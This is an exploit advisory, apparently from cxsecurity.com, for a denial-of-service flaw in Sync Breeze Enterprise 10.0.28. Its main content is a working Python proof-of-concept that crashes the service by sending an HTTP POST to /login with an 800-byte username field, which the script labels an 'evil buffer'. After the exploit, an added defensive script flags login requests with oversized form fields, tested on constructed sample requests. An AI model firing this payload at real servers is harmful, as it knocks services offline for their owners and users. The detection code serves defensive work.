Sync Breeze Enterprise 10.0.28 Denial-of-Service (PoC)

2020.06.16
Credit: Anon
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

#!/usr/bin/python
import socket
import sys

try:
    server = sys.argv[1]
    port = 80
    size = 800
    inputBuffer = b"A" * size
    content = b"username=" + inputBuffer + b"&password=A"

    buffer = b"POST /login HTTP/1.1\r\n"
    buffer += b"Host: " + server.encode() + b"\r\n"
    buffer += b"User-Agent: Mozilla/5.0 (X11; Linux_86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\n"
    buffer += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
    buffer += b"Accept-Language: en-US,en;q=0.5\r\n"
    buffer += b"Referer: http://10.11.0.22/login\r\n"
    buffer += b"Connection: close\r\n"
    buffer += b"Content-Type: application/x-www-form-urlencoded\r\n"
    buffer += b"Content-Length: " + str(len(content)).encode() + b"\r\n"
    buffer += b"\r\n"
    buffer += content

    print("Sending evil buffer...")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((server, port))
    s.send(buffer)
    s.close()
    print("Done!")

except socket.error:
    print("Could not connect!")
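
For defenders, a check that flags requests shaped like the one this PoC sends (a POST to /login carrying an oversized form field) can run in a reverse proxy or over captured traffic. The following is an added example, not part of the original advisory or of the vendor's code; the 256-character limit, the function names and the sample host are assumptions.

```python
from urllib.parse import parse_qsl

MAX_FIELD_LEN = 256  # assumed policy limit, not a value from the advisory


def oversized_login_fields(raw_request: bytes, limit: int = MAX_FIELD_LEN):
    """Return {field: length} for POST /login form fields longer than limit."""
    head, sep, body = raw_request.partition(b"\r\n\r\n")
    if not sep:
        return {}  # incomplete request: no header/body separator
    parts = head.split(b"\r\n")[0].split()
    if len(parts) != 3:
        return {}  # malformed request line
    method, target, _version = parts
    path = target.split(b"?", 1)[0]
    if method != b"POST" or path != b"/login":
        return {}
    # Measure the decoded value so percent-encoding cannot hide the real size.
    fields = parse_qsl(body.decode("latin-1"), keep_blank_values=True)
    return {name: len(value) for name, value in fields if len(value) > limit}


def build_request(username: bytes) -> bytes:
    """Constructed sample request with the same shape as the PoC's."""
    content = b"username=" + username + b"&password=A"
    return (
        b"POST /login HTTP/1.1\r\n"
        b"Host: sample.invalid\r\n"
        b"Content-Type: application/x-www-form-urlencoded\r\n"
        b"Content-Length: " + str(len(content)).encode() + b"\r\n"
        b"\r\n" + content
    )


if __name__ == "__main__":
    # Constructed inputs: a normal login and one with the PoC's 800-byte field.
    for label, user in (("normal", b"alice"), ("poc-sized", b"A" * 800)):
        print(label, oversized_login_fields(build_request(user)))
```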



Copyright 2020, cxsecurity.com

 
